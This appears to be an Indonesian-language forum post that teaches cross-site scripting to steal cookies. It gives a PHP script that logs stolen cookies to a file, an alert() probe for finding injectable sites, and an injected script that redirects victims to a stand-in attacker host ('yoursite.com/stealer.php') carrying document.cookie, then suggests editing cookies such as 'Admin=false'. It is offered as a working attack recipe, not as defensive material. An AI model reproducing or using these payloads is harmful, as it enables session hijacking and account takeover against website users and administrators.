Ane mau buat tutor XSS ni
Skalian numpang gabung d sni
Sebelomnya cek dolo tuh web bisa di injeksi pa ga caranya ada di step 2
Step 1
/*Ethernets Cookie Stealer */ /*Put this up on your free site */ $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?>
save => stealer.php
Step2 Untuk pengecekan apakah bisa di inject xss gunain javascriptnya
<script>alert(’Testing For XSS Hole’)</script>
Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni
Step 3 <script> window.location = 'http://yoursite.com/stealer.php?cookie=' + document.cookie; </script>
step 4 Nah buka xssed.txtnya deh
step 5 Cookie Manipulation:
Ni cuman contoh aja Terkadang lo bakan melihat cookie yang terlihat seperti:
Admin=false; Or Logged_in=true;
Jangan binggung gunain javascriptnya
|